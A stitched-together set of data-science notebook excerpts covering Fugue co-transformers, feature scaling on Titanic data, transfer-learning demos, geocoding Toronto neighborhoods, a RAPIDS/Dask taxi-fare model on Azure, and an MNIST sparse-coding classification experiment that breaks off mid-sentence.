But for certain cases, you should implement interface, for example* You need partition information, such as partition keys, schema, and current values of the keys* You have an expensive but common initialization step for processing each logical partition, this should happen when initializaing physical partitionThe biggest advantage of interface approach is that you can customize pyhisical partition level initialization, and you have all the up-to-date context variables to use.In the interface approach, type annotations are not necessary, but again, it's good practice to have them.#from fugue import Transformer, FugueWorkflow, DataFrame, LocalDataFrame, PandasDataFrame from fugue import CoTransformer, FugueWorkflow, PandasDataFrame, DataFrame, ArrayDataFrame from triad.collections import Schema from time import sleep import pandas as pd import numpy as np def expensive_init(sec=5): sleep(sec) def helper(ct=20) -> pd.DataFrame: np.random.seed(0) return pd.DataFrame(np.random.randint(0,10,size=(ct, 2)), columns=list('ab')) class Median(CoTransformer): # this is invoked on driver side def get_output_schema(self, dfs): return self.key_schema + [k+":double" for k in dfs.keys()] # on initialization of the physical partition def on_init(self, df: DataFrame) -> None: expensive_init(self.params.get("sec",0)) def transform(self, dfs): result = self.cursor.key_value_array for k, v in dfs.items(): m = v.as_pandas()["b"].median() result.append(m) return ArrayDataFrame([result], self.output_schema) with FugueWorkflow() as dag: # a, b are identical because of the seed a=dag.create(helper) b=dag.create(helper) dag.zip(dict(x=a,y=b), partition={"by":["a"]}).transform(Median, params={"sec": 1}).show(rows=100)Notice a few things here:* How we access the key schema (`self.key_schema`), and current logical partition's keys as array (`self.cursor.key_value_array`)* Although DataFrames is a dict, it's an ordered dict following the input order, so you can iterate in this way* `expensive_init` is something that is a common initialization for different logical partitions, we move it to `on_init` so it will run once for each physcial partition. Output CoTransformer`OutputCoTransfomer` is in general similar to `CoTransformer`. And any `CoTransformer` can be used as `OutputCoTransformer`. It is important to understand the difference between the operations `transform` and `out_transform`* `transform` is lazy, Fugue does not ensure the compute immediately. For example, if using `SparkExecutionEngine`, the real compute of `transform` happens only when hitting an action, for example `save`.* `out_transform` is an action, Fugue ensures the compute happening immediately, regardless of what execution engine is used.* `transform` outputs a transformed dataframe for the following steps to use* `out_transform` is the last compute of a branch in the DAG, it outputs nothing.You may find that `transform().persist()` can be an alternative to `out_transform`, it's in general ok, but you must notice that, the output dataframe of a transformation can be very large, if you persist or checkpoint it, it can take up great portion of memory or disk space. In contrast, `out_transform` does not take any space. 
Plus, it is a more explicit way to show what you want to do.A typical use case is to distributedly compare two dataframes per partition Native Approachfrom typing import List, Any def assert_eq(df1:List[List[Any]], df2:List[List[Any]]) -> None: assert df1 == df2 print(df1,"==",df2) # schema: a:int def assert_eq_2(df1:List[List[Any]], df2:List[List[Any]]) -> List[List[Any]]: assert df1 == df2 print(df1,"==",df2) return [[0]] from fugue import FugueWorkflow with FugueWorkflow() as dag: df1 = dag.df([[0,1],[0,2],[1,3]], "a:int,b:int") df2 = dag.df([[1,3],[0,2],[0,1]], "a:int,b:int") z = df1.zip(df2, partition=dict(by=["a"],presort=["b"])) z.out_transform(assert_eq) z.out_transform(assert_eq_2) # All CoTransformer like functions/classes can be used directlyDecorator ApproachThere is no obvious advantage to use decorator for `OutputCoTransformer`from typing import List, Any from fugue.extensions import output_cotransformer from fugue import FugueWorkflow @output_cotransformer() def assert_eq(df1:List[List[Any]], df2:List[List[Any]]) -> None: assert df1 == df2 print(df1,"==",df2) with FugueWorkflow() as dag: df1 = dag.df([[0,1],[0,2],[1,3]], "a:int,b:int") df2 = dag.df([[1,3],[0,2],[0,1]], "a:int,b:int") z = df1.zip(df2, partition=dict(by=["a"],presort=["b"])) z.out_transform(assert_eq)Interface ApproachJust like the interface approach of `CoTransformer`, you get all the flexibilities and control over your transformationfrom typing import List, Any from fugue.extensions import OutputCoTransformer from fugue import FugueWorkflow class AssertEQ(OutputCoTransformer): # notice the interface is different from CoTransformer def process(self, dfs): df1, df2 = dfs[0].as_array(), dfs[1].as_array() assert df1 == df2 print(df1,"==",df2) with FugueWorkflow() as dag: df1 = dag.df([[0,1],[0,2],[1,3]], "a:int,b:int") df2 = dag.df([[1,3],[0,2],[0,1]], "a:int,b:int") z = df1.zip(df2, partition=dict(by=["a"],presort=["b"])) z.out_transform(AssertEQ)Min/Max ScalingIn min/max scaling, you subtract each value by the minimum value and then divide the result by the difference of minimum and maximum value in the dataset. To implement the min/max scaling, you can use the MinMaxScaler class from the sklearn.preprocessing module. You have to pass the Pandas dataframe containing the dataset to the fit() method of the class and then to the transorm() method of the MinMaxScaler class. The following script implements min/max scaling on the age, fare, and pclass columns of the Titanic dataset.from sklearn.preprocessing import MinMaxScaler scaler=MinMaxScaler() scaler.fit(titanic_data) scaled_data=scaler.transform(titanic_data) pd.DataFrame(scaled_data,columns=titanic_data.columns)Mean NormalizationMean normalization is very similar to min/max scaling, except in mean normalization the mean of the dataset is subtracted from each value and the result is divided by the range, i.e., the difference between the minimum and maximum values.#First finding the mean of the datasets mean_val=titanic_data.mean(axis=0) mean_val #find the range rang_vals=titanic_data.max(axis=0)-titanic_data.min(axis=0) rang_vals # applies mean normalization to the complete dataset. 
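# i.e. per column: x_scaled = (x - mean(x)) / (max(x) - min(x)), so the scaled values are centred around 0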
titanic_data_scaled=(titanic_data-mean_val)/rang_vals titanic_data_scaled plt.style.use('fivethirtyeight') sns.kdeplot(titanic_data_scaled['Age'],color='#444444')Generate some datadef sample_from_GMM(means, covariances, sizes): X = [] for i, s in enumerate(sizes): X_sample = np.random.multivariate_normal(means[i], covariances[i], s) X.append(X_sample) return np.concatenate(X) # source and target domains Xs1 = sample_from_GMM({0: [-1, -1], 1: [4, 4], 2: [-6, 8]}, {0: np.eye(2), 1: np.eye(2), 2: np.eye(2) + 2}, [400, 300, 300]) Xt1 = sample_from_GMM({0: [-3, -1], 1: [6, 7], 2: [-6, 8]}, {0: np.eye(2)+0.5, 1: np.eye(2), 2: [[1, -0.5], [-0.5, 1]]}, [400, 300, 300]) Xs2 = sample_from_GMM({0: [0, 0], 1: [0, 8]}, {0: [[1, 0.9], [0.9, 1]], 1: [[1.5, 0.25], [0.25, 1.5]]}, [400, 300]) Xt2 = sample_from_GMM({0: [2, 0], 1: [-6, 7]}, {0: [[1, -0.5], [-0.5, 1]], 1: [[1.2, 0.75], [0.75, 1.2]]}, [400, 300])Transfer algorithmsdef plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans): fig, axes = plt.subplots(2, 2, figsize=(10, 10)) axes_f = axes.flatten() s_color = '#ed7811' t_color = '#0772b0' # plot first axes[0, 0].scatter(Xs1[:, 0], Xs1[:, 1], label='source', c=s_color, edgecolors='black') axes[0, 0].scatter(Xt1[:, 0], Xt1[:, 1], label='target', c=t_color, edgecolors='black') axes[0, 0].set_title('Before transfer') axes[0, 1].scatter(Xt1_trans[:, 0], Xt1_trans[:, 1], label='target', c=t_color, edgecolors='black') if len(Xs1_trans) > 0: axes[0, 1].scatter(Xs1_trans[:, 0], Xs1_trans[:, 1], label='source', c=s_color, edgecolors='black') axes[0, 1].set_title('After transfer') # plot second axes[1, 0].scatter(Xs2[:, 0], Xs2[:, 1], label='source', c=s_color, edgecolors='black') axes[1, 0].scatter(Xt2[:, 0], Xt2[:, 1], label='target', c=t_color, edgecolors='black') axes[1, 0].set_title('Before transfer') axes[1, 1].scatter(Xt2_trans[:, 0], Xt2_trans[:, 1], label='target', c=t_color, edgecolors='black') if len(Xs2_trans) > 0: axes[1, 1].scatter(Xs2_trans[:, 0], Xs2_trans[:, 1], label='source', c=s_color, edgecolors='black') axes[1, 1].set_title('After transfer') # clean up for i in range(len(axes_f)): axes_f[i].grid(alpha=0.4) axes_f[i].legend() plt.show()LocITfrom transfertools.models import LocIT # transfer with CORAL transfor = LocIT(psi=10, train_selection='random', scaling='standard') Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1) transfor = LocIT(psi=10, train_selection='random', scaling='standard') Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)CORALfrom transfertools.models import CORAL # transfer with CORAL transfor = CORAL(scaling='standard') Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1) transfor = CORAL(scaling='standard') Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)TCAfrom transfertools.models import TCA # transfer with CORAL transfor = TCA(mu=0.1, kernel_type='linear', scaling='standard') Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1) transfor = TCA(mu=0.1, kernel_type='rbf', scaling='standard') Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)Warning: covariate matrices not PSD. 
Adding regularization: 1e-06CBITfrom transfertools.models import CBIT ys1 = np.ones(len(Xs1), dtype=int) * -1 ys1[-100:] = 1 yt1 = np.ones(len(Xt1), dtype=int) * -1 yt1[-100:] = 1 # transfer with CORAL transfor = CBIT(n_clusters=20, beta=1.5) Xs1_trans, Xt1_trans = transfor.fit_transfer(Xs1, Xt1, ys1, yt1) transfor = CBIT() Xs2_trans, Xt2_trans = transfor.fit_transfer(Xs2, Xt2) del transfor # plot sources and targets plot_transfer(Xs1, Xt1, Xs1_trans, Xt1_trans, Xs2, Xt2, Xs2_trans, Xt2_trans)Gathering Latitudes and Longitudes of Neighborhoods of TorontoPreviously we have gathered the names of the neighborhoodsimport requests import pandas as pd import numpy as np df = pd.read_csv("toronto_city_guide_capstone") df.head()Geocoder kicks in :D#!pip install geocoder import geocoder # import geocoder for postalCode in df['PostalCode']: lat_lng_coords = None print(postalCode) counter = 0 while(lat_lng_coords is None): g = geocoder.google('{}, Toronto, Ontario'.format(postalCode)) lat_lng_coords = g.latlng counter = counter +1 print("at ", counter, " trial") latitude = lat_lng_coords[0] longitude = lat_lng_coords[1] df[postalCode]['Latitude'] = latitude df[postalCode]['Longitude'] = longitude print("at ", counter, " trials found: ", postalCode, " at (", latitude, " , ", longitude, ")") print("----------------------------------------------------------------") df.head()M3A at 1 trial at 2 trial at 3 trial at 4 trial at 5 trial at 6 trial at 7 trial at 8 trial at 9 trial at 10 trial at 11 trial at 12 trial at 13 trial at 14 trial at 15 trial at 16 trial at 17 trial at 18 trial at 19 trial at 20 trial at 21 trial at 22 trial at 23 trial at 24 trial at 25 trial at 26 trial at 27 trial at 28 trial at 29 trial at 30 trial at 31 trial at 32 trial at 33 trial at 34 trial at 35 trial at 36 trial at 37 trial at 38 trial at 39 trial at 40 trial at 41 trial at 42 trial at 43 trial at 44 trial at 45 trial at 46 trial at 47 trial at 48 trial at 49 trial at 50 trial at 51 trial at 52 trial at 53 trial at 54 trial at 55 trial at 56 trial at 57 trial at 58 trial at 59 trial at 60 trial at 61 trial at 62 trial at 63 trial at 64 trial at 65 trial at 66 trial at 67 trialSeems like given geocoder API does not return anything...df_given_lang_long = pd.read_csv("Geospatial_Coordinates.csv") df_given_lang_long.head() df.shape df_given_lang_long.shape for label, given_data in df_given_lang_long.iterrows(): df.loc[df['PostalCode']== given_data['Postal Code'],'Latitude'] = given_data['Latitude'] df.loc[df['PostalCode']== given_data['Postal Code'],'Longitude'] = given_data['Longitude'] df[0:21] df.to_csv("neighborhoods_with_coordinates")Multi-node multi-GPU example on Azure using dask-cloudprovider[Dask Cloud Provider](https://cloudprovider.dask.org/en/latest/) is a native cloud intergration for dask. It helps manage Dask clusters on different cloud platforms. In this notebook, we will look at how we can use the package to set-up a Azure cluster and run a multi-node, multi-GPU example with [RAPIDS](https://rapids.ai/). RAPIDS provides a suite of libraries to accelerate data science pipelines on the GPU entirely. This can be scaled to multiple nodes using Dask as we will see through this notebook. For the purposes of this demo, we will use the a part of the NYC Taxi Dataset (only the files of 2014 calendar year will be used here). The goal is to predict the fare amount for a given trip given the times and coordinates of the taxi trip. 
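At a high level, the rest of this notebook follows the usual dask-cloudprovider pattern: create an `AzureVMCluster`, attach a `dask.distributed.Client`, scale out GPU workers, run the RAPIDS workload through the client, then shut everything down. The sketch below is only a minimal outline of that pattern; the resource names are placeholders, and the concrete values used in this notebook are defined in the setup cells that follow.

```python
from dask.distributed import Client
from dask_cloudprovider.azure import AzureVMCluster

# Placeholder Azure resources -- substitute the ones created in your subscription.
cluster = AzureVMCluster(
    location="SOUTH CENTRAL US",
    resource_group="my-resource-group",
    vnet="my-vnet",
    security_group="my-security-group",
    vm_size="Standard_NC12s_v3",
    docker_image="rapidsai/rapidsai-core:cuda10.2-runtime-ubuntu18.04-py3.8",
    worker_class="dask_cuda.CUDAWorker",
)

with Client(cluster) as client:
    cluster.scale(2)             # request two GPU worker VMs
    client.wait_for_workers(2)   # block until they have registered
    # ... dask_cudf / cuML work submitted through `client` goes here ...

cluster.close()
```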
Before running the notebook, run the following commands in the terminal to setup Azure CLI```pip install azure-cliaz login```And follow the instructions on the prompt to finish setting up the account.The list of packages needed for this notebook is listed in the cell below - uncomment and run the cell to set it up.# !pip install "dask-cloudprovider[azure]" # !pip install "dask-cloudprovider[azure]" --upgrade # !pip install --upgrade azure-mgmt-network azure-mgmt-compute # !pip install gcsfs # !pip install dask_xgboost # !pip install azureml from dask.distributed import Client, wait from dask_cuda import LocalCUDACluster import dask_cudf import numpy as npAzure cluster set upLet us now setup the [Azure cluster](https://cloudprovider.dask.org/en/latest/azure.html) using `AzureVMCluster` from Dask Cloud Provider. To do this, you;ll first need to set up a Resource Group, a Virtual Network and a Security Group on Azure. [Learn more about how you can set this up](https://cloudprovider.dask.org/en/latest/azure.htmlresource-groups). Note that you can also set it up using the Azure portal directly.Once you have set it up, you can now plug in the names of the entities you have created in the cell below. Finally note that we use the RAPIDS docker image to build the VM and use the `dask_cuda.CUDAWorker` to run within the VM.location = "SOUTH CENTRAL US" resource_group = "RAPIDS-HPO-test" vnet = "dask-vnet" security_group = "test-security-group" vm_size = "Standard_NC12s_v3" docker_image = "rapidsai/rapidsai-core:cuda10.2-runtime-ubuntu18.04-py3.8" worker_class = "dask_cuda.CUDAWorker" n_workers = 2 env_vars = {"EXTRA_PIP_PACKAGES": "gcsfs"} from dask_cloudprovider.azure import AzureVMCluster cluster = AzureVMCluster( location=location, resource_group=resource_group, vnet=vnet, security_group=security_group, vm_size=vm_size, docker_image=docker_image, worker_class=worker_class, env_vars=env_vars, )Let's look at the data locally to see what we're dealing with. We will make use of the data from 2014 for the purposes of the demo. We see that there are columns for pickup and dropoff times, distance, along with latitude, longitude, etc. These are the information we'll use to estimate the trip fare amount.base_path = 'gcs://anaconda-public-data/nyc-taxi/csv/' tmp_df = dask_cudf.read_csv(base_path+'2014/yellow_tripdata_2014*.csv', n_rows=1000) tmp_df.head().to_pandas() # Let's delete the dataframe and free up some memory del tmp_dfData CleanupThe data needs to be cleaned up before it can be used in a meaningful way. We first perform a renaming of some columns to a cleaner name (for instance, some of the years have `tpep_ropoff_datetime` instead of `dropfoff_datetime`). We also define the datatypes each of the columns need to be read as.# list of column names that need to be re-mapped remap = {} remap['tpep_pickup_datetime'] = 'pickup_datetime' remap['tpep_dropoff_datetime'] = 'dropoff_datetime' remap['ratecodeid'] = 'rate_code' #create a list of columns & dtypes the df must have must_haves = { 'pickup_datetime': 'datetime64[ms]', 'dropoff_datetime': 'datetime64[ms]', 'passenger_count': 'int32', 'trip_distance': 'float32', 'pickup_longitude': 'float32', 'pickup_latitude': 'float32', 'rate_code': 'int32', 'dropoff_longitude': 'float32', 'dropoff_latitude': 'float32', 'fare_amount': 'float32' } def clean(df_part, remap, must_haves): """ This function performs the various clean up tasks for the data and returns the cleaned dataframe. 
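    Args:
        df_part: a cudf/dask_cudf DataFrame partition to clean.
        remap: dict mapping raw column names to the canonical names used downstream.
        must_haves: dict of required column names to their target dtypes; any column not listed here is dropped.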
""" tmp = {col:col.strip().lower() for col in list(df_part.columns)} df_part = df_part.rename(columns=tmp) # rename using the supplied mapping df_part = df_part.rename(columns=remap) # iterate through columns in this df partition for col in df_part.columns: # drop anything not in our expected list if col not in must_haves: df_part = df_part.drop(col, axis=1) continue # fixes datetime error found by and fixed by if df_part[col].dtype == 'object' and col in ['pickup_datetime', 'dropoff_datetime']: df_part[col] = df_part[col].astype('datetime64[ms]') continue # if column was read as a string, recast as float if df_part[col].dtype == 'object': df_part[col] = df_part[col].str.fillna('-1') df_part[col] = df_part[col].astype('float32') else: # downcast from 64bit to 32bit types # Tesla T4 are faster on 32bit ops if 'int' in str(df_part[col].dtype): df_part[col] = df_part[col].astype('int32') if 'float' in str(df_part[col].dtype): df_part[col] = df_part[col].astype('float32') df_part[col] = df_part[col].fillna(-1) return df_partAdd Interesting FeaturesWe'll add new features by making use of "uder defined functions" on the dataframe. We'll make use of [apply_rows](https://docs.rapids.ai/api/cudf/stable/api.htmlcudf.core.dataframe.DataFrame.apply_rows), which is similar to Pandas' apply funciton. `apply_rows` operation is [JIT compiled by numba](https://numba.pydata.org/numba-doc/dev/cuda/kernels.html) into GPU kernels. The kernels we define are - 1. Haversine distance: This is used for calculating the total trip distance.2. Day of the week: This can be useful information for determining the fare cost.`add_features` function combined the two to produce a new dataframe that has the added features.import math from math import cos, sin, asin, sqrt, pi def haversine_distance_kernel(pickup_latitude, pickup_longitude, dropoff_latitude, dropoff_longitude, h_distance): for i, (x_1, y_1, x_2, y_2) in enumerate(zip(pickup_latitude, pickup_longitude, dropoff_latitude, dropoff_longitude)): x_1 = pi/180 * x_1 y_1 = pi/180 * y_1 x_2 = pi/180 * x_2 y_2 = pi/180 * y_2 dlon = y_2 - y_1 dlat = x_2 - x_1 a = sin(dlat/2)**2 + cos(x_1) * cos(x_2) * sin(dlon/2)**2 c = 2 * asin(sqrt(a)) r = 6371 # Radius of earth in kilometers h_distance[i] = c * r def day_of_the_week_kernel(day, month, year, day_of_week): for i, (d_1, m_1, y_1) in enumerate(zip(day, month, year)): if month[i] <3: shift = month[i] else: shift = 0 Y = year[i] - (month[i] < 3) y = Y - 2000 c = 20 d = day[i] m = month[i] + shift + 1 day_of_week[i] = (d + math.floor(m*2.6) + y + (y//4) + (c//4) -2*c)%7 def add_features(df): df['hour'] = df['pickup_datetime'].dt.hour df['year'] = df['pickup_datetime'].dt.year df['month'] = df['pickup_datetime'].dt.month df['day'] = df['pickup_datetime'].dt.day df['diff'] = df['dropoff_datetime'].astype('int32') - df['pickup_datetime'].astype('int32') df['pickup_latitude_r'] = df['pickup_latitude']//.01*.01 df['pickup_longitude_r'] = df['pickup_longitude']//.01*.01 df['dropoff_latitude_r'] = df['dropoff_latitude']//.01*.01 df['dropoff_longitude_r'] = df['dropoff_longitude']//.01*.01 df = df.drop('pickup_datetime', axis=1) df = df.drop('dropoff_datetime', axis =1) df = df.apply_rows(haversine_distance_kernel, incols=['pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude'], outcols=dict(h_distance=np.float32), kwargs=dict()) df = df.apply_rows(day_of_the_week_kernel, incols=['day', 'month', 'year'], outcols=dict(day_of_week=np.float32), kwargs=dict()) df['is_weekend'] = (df['day_of_week']<2) return dfTrain 
RF modelWe are now ready to fit a Random Forest on the data to predict the fare for the trip.cu_rf_params = { 'n_estimators': 100, 'max_depth': 16, }The cell below creates a client with the cluster we defined earlier in the notebook. Note that we have `cluster.scale`. This is the step where the workers are allocated.Once workers become available, we can now run the rest of our workflow - reading and cleaning the data, splitting into training and validation sets, fitting a RF model and predicting on the validation set. We print out the MSE metric for this problem. Note that for better performance we should perform HPO ideally. Refer to the notebooks in the repository for how to perform automated HPO [using RayTune](https://github.com/rapidsai/cloud-ml-examples/blob/main/ray/notebooks/Ray_RAPIDS_HPO.ipynb) and [using Optuna](https://github.com/rapidsai/cloud-ml-examples/blob/main/optuna/notebooks/optuna_rapids.ipynb).with Client(cluster) as client: print("Start Workflow") cluster.scale(2) client.wait_for_workers(4) print("Step 0 - Got Workers") print(client) base_path = 'gcs://anaconda-public-data/nyc-taxi/csv/' df_2014 = dask_cudf.read_csv(base_path+'2014/yellow_tripdata_2014*.csv', n_rows=20000) print("Step 1 - Finished reading file") df_2014 = clean(df_2014, remap, must_haves) # Query the dataframe to clean up the outliers query_frags = [ 'fare_amount > 0 and fare_amount < 500', 'passenger_count > 0 and passenger_count < 6', 'pickup_longitude > -75 and pickup_longitude < -73', 'dropoff_longitude > -75 and dropoff_longitude < -73', 'pickup_latitude > 40 and pickup_latitude < 42', 'dropoff_latitude > 40 and dropoff_latitude < 42' ] df_2014 = df_2014.query(' and '.join(query_frags)) print("Step 2 - Cleaned data and removed outliers") taxi_df = df_2014.map_partitions(add_features) print("Step 3 - Added features") taxi_df = taxi_df.dropna() taxi_df = taxi_df.astype("float32") from dask_ml.model_selection import train_test_split from cuml.dask.common import utils as dask_utils X, y = taxi_df.drop(["fare_amount"], axis=1), taxi_df["fare_amount"].astype('float32') X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, shuffle=True) print("Step 4 - Split data") workers = client.has_what().keys() X_train, X_test, y_train, y_test = dask_utils.persist_across_workers(client, [X_train, X_test, y_train, y_test], workers=workers) from cuml.dask.ensemble import RandomForestRegressor cu_dask_rf = RandomForestRegressor(ignore_empty_partitions=True) cu_dask_rf = cu_dask_rf.fit(X_train, y_train) wait(cu_dask_rf.rfs) print("Step 5 - Fitted RF") y_pred = cu_dask_rf.predict(X_test) print("Step 6 - Predicted on test set") _y_pred, _y_test = y_pred.compute().to_array(), y_test.compute().to_array() print("Step 7 - Calculating MSE") from cuml.metrics import mean_squared_error score = mean_squared_error(_y_pred, _y_test) print("Workflow Complete - RMSE: ", np.sqrt(score)) client.close() cluster.close()Hypothesis Test - does joint sparsity bring any benefit?In this notebook we examine weather joint sparsity has any benefit over standard sparse coding techniques for classification. The rough idea is that a joint sparse forward pass will learn a code or representation for the a data point that takes into account other examples of the same class. In effect then we are trying to map all members of a given class onto a particular subspace. 
To test the benefits we consider two tests:- classification: we perform classification by taking the set of sparse representations of a class and then performing SVD, so as to identify say the top 5 singular vectors that span a linear space which in some sense represents the given class label in the encoder space. We benchmark against standard IHT and PCA.- reconstruction / decoding: we observe the reconstruction rate for JIHT vs IHT and PCA. It is expected that IHT should have a better reconstruction error. Methodology For classification:For the IHT/ JIHT:- we train a model on MNIST with an IHT/ JIHT forward pass- we then run the entire MNIST training set through the model to find all the training data point encodings- group the encodings by class, and carry out SVD to find the top j singular vectors. These j vectors span a linear manifold or subspace which we 'associate' with the class- then run the entire test set through the model to find all the test data point encodings- classify each test data point by assigning it to the class whose linear manifold or subspace is closest to the data point's encoding under projectionPCA benchmarking approach:- Find the j principal components of the training data set for each class- Project the test data onto each of the sets of j principal components of each class- Assign a test data point to the class for which it has the largest projection (shortest distance). Then compare them all by looking at the percentage of data points that they correctly categorised. For reconstruction:For the IHT/ JIHT:- Simple: forward pass and then reverse pass, calculate the l2 distance between the decoded and original data point. Calculate the percentage error over the entire test set and training set. Also plot to inspect visually.PCA benchmarking approach:- Calculate the m principal components of the training data set (these act as our atoms)- For each data point, encode it as the sum of the K principal components to which the data point is closest (calculate the inner product between the data point and each principal component, and select the largest K)- Reconstruct the data point or image from just these K principal componentsCompare the total reconstruction error between IHT, JIHT and PCA for both the test and training data sets. 
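The projection step described above amounts to a few lines of linear algebra. The following is a minimal NumPy sketch (not code from this notebook) of the classifier, assuming `encodings_by_class` maps each label to an (n_samples, code_dim) array of training encodings and `test_codes` is an (n_test, code_dim) array; all names here are placeholders.

import numpy as np

def class_subspaces(encodings_by_class, j):
    # SVD of each class's encodings; keep the top-j left singular vectors as an orthonormal basis
    subspaces = {}
    for label, codes in encodings_by_class.items():
        U, S, Vt = np.linalg.svd(codes.T, full_matrices=False)  # columns of codes.T are data points
        subspaces[label] = U[:, :j]  # (code_dim, j)
    return subspaces

def classify_by_projection(test_codes, subspaces):
    # assign each test encoding to the class whose subspace captures the most of its energy
    labels = sorted(subspaces)
    proj = np.stack([np.linalg.norm(test_codes @ subspaces[c], axis=1) for c in labels], axis=1)
    return np.array(labels)[np.argmax(proj, axis=1)]

Note that for a fixed encoding z and an orthonormal basis U_c, ||z||^2 = ||U_c^T z||^2 + ||residual||^2, so picking the class with the largest projection norm is the same as picking the subspace that z is closest to.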
Import MNIST DataFirst script simply imports the MNIST training and test dataimport numpy as np from numpy import linalg as LA from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt from matplotlib import cm from sklearn.decomposition import PCA import random import os import yaml import importlib import torch import torch.nn as nn import torchvision import torchvision.datasets as dsets import torchvision.transforms as transforms from torch.autograd import Variable from torch.utils.data.sampler import SubsetRandomSampler from skimage import data, color from skimage.transform import rescale, resize, downscale_local_mean device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") # Parameters rep_batch_size = 20000 test_batch_size = 2000 # Set the maximum dimension of the linear manifolds for each class L=50 # Sparsity value for pca numb_atoms = 500 K=50 # Load MNIST root = './data' download = True # download MNIST dataset or not # Access MNIST dataset and define processing transforms to proces trans = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]) # trans = transforms.Compose([transforms.ToTensor()]) train_data = dsets.MNIST(root=root, train=True, transform=trans, download=download) test_data = dsets.MNIST(root=root, train=False, transform=trans) train_loader = torch.utils.data.DataLoader( dataset=train_data, batch_size=rep_batch_size, sampler = None, shuffle=True) test_loader = torch.utils.data.DataLoader( dataset=test_data, batch_size=test_batch_size, shuffle=True)Prepare training and test data to be used in models and hypothesis tests.# Format data so that can be run through model train_x, train_labels = next(iter(train_loader)) b_train_x = (train_x.view(-1, 28*28)).to(device) # batch x, shape (batch, 28*28) b_train_labels = (train_labels).to(device) # mean_train_x = torch.mean(temp, dim=0, keepdim=True) # b_train_x = temp - mean_train_x test_x, test_labels = next(iter(test_loader)) b_test_x = (test_x.view(-1, 28*28)).to(device) # batch x, shape (batch, 28*28) b_test_labels = (test_labels).to(device) # temp = (test_x.view(-1, 28*28)).to(device) # batch x, shape (batch, 28*28) # mean_test_x = torch.mean(b_test_x, dim=0, keepdim=True) # b_test_x = temp - mean_train_x # # Plot picture of means removed # fig = plt.figure(figsize=(5,5)) # plt.subplot(1, 2, 1) # plt.imshow(np.reshape(mean_train_x.cpu().data.numpy(), (28, 28)), cmap='gray') # plt.subplot(1, 2, 2) # plt.imshow(np.reshape(mean_test_x.cpu().data.numpy(), (28, 28)), cmap='gray') # plt.show() # Sort data into classes so that can be processed for classification test label_bin_data = {"0":[], "1":[], "2":[], "3":[], "4":[], "5":[], "6":[], "7":[], "8":[], "9":[]} data_by_class = {} test_label_bin_data = {"0":[], "1":[], "2":[], "3":[], "4":[], "5":[], "6":[], "7":[], "8":[], "9":[]} test_data_by_class = {} # Firstly sort data into different classes, where each dictionary member is a list of data points for i in range(b_train_labels.size()[0]): label_bin_data[str(int(b_train_labels[i].item()))].append(b_train_x[i,:]) # Format dictionary so each dictionary element is a matrix of data points for key, tensor_list in label_bin_data.items(): if len(label_bin_data[key]) > 0: data_by_class[key] = torch.stack(label_bin_data[key], dim=0) # # Sort test data into different classes to observe different performance # for i in range(b_test_labels.size()[0]): # test_label_bin_data[str(int(b_test_labels[i].item()))].append(b_test_x[i,:]) # # Format dictionary so each dictionary 
element is a matrix of data points # for key, tensor_list in test_label_bin_data.items(): # if len(test_label_bin_data[key]) > 0: # test_data_by_class[key] = torch.stack(test_label_bin_data[key], dim=0)IHT Model IHT Reconstruction Firstly just load the IHT model and check few examples for visual inspection:# Load mode import auxillary as aux importlib.reload(aux) N_TEST_IMG = 5 iht_model_id = '478937' #'570864' iht_model_filename = 'IHT' + iht_model_id iht_model = aux.load_model(iht_model_filename) # Check that reconstructions etc. are working as they fig = plt.figure(figsize=(5, 2)) # original data (first row) for viewing # view_data = Variable(test_data.test_data[:N_TEST_IMG].view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = Variable(b_test_x.view(-1, 28*28).type(torch.FloatTensor)/255.) view_data = view_data.to(device) iht_test_decoded, encoded, errIHT = iht_model(view_data) for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+1) plt.imshow(np.reshape(view_data.cpu().data.numpy()[i], (28, 28)), cmap='gray') for i in range(N_TEST_IMG): plt.subplot(2,N_TEST_IMG,i+6) plt.imshow(np.reshape(iht_test_decoded.cpu().data.numpy()[i], (28, 28)), cmap='gray') plt.show()Calculate overall train and test reconstruction error:# Process entire data set for the reconstruction test train_decoding, train_encoding, errIHT_train = iht_model(b_train_x) test_decoding, test_encoding, errIHT_test = iht_model(b_test_x) print('Train error: ', errIHT_train[-1]) print('Test error: ', errIHT_test[-1])Train error: 0.24826978147 Test error: 0.246386528015IHT Classification We are trying to calculate the low dimensional manifold that best represents each class in the encoded space space. To do this we calculate a set of encodings for each class, and then carry out SVD on this class to find a low dimensional linear manifold which each member of that class at least roughly lies on.from numpy import linalg as LA from sklearn.decomposition import PCA # Initialise the dictionaries to hold the encodings and span of the linear manifolds for each class iht_class_codes = {} iht_class_svd = {} # Process each class set of data points and calculate linear manifold for key, tensor_list in data_by_class.items(): if len(data_by_class[key]) > 0: _, iht_class_codes[key], _ = iht_model(data_by_class[key]) temp_npy = np.asarray(iht_class_codes[key]) U, S, Vh = LA.svd(temp_npy.transpose(), full_matrices=True, compute_uv=True) iht_class_svd[key] = U[:,:L] # print(data_by_class[key].shape) # print(iht_class_codes[key].shape) # print(U.shape) # print(iht_class_svd[key].shape)With the linear manifold calculated for each class test by processing the test data set and classifying each test data point by projecting onto each class linear manifold, and assign it a label by choosing the class for which it has the smallest projection (is closest to).# Initialise matrix to store the projections of each data point onto each class x_test_proj = np.zeros((test_batch_size, 10)) # Create sparse code for each 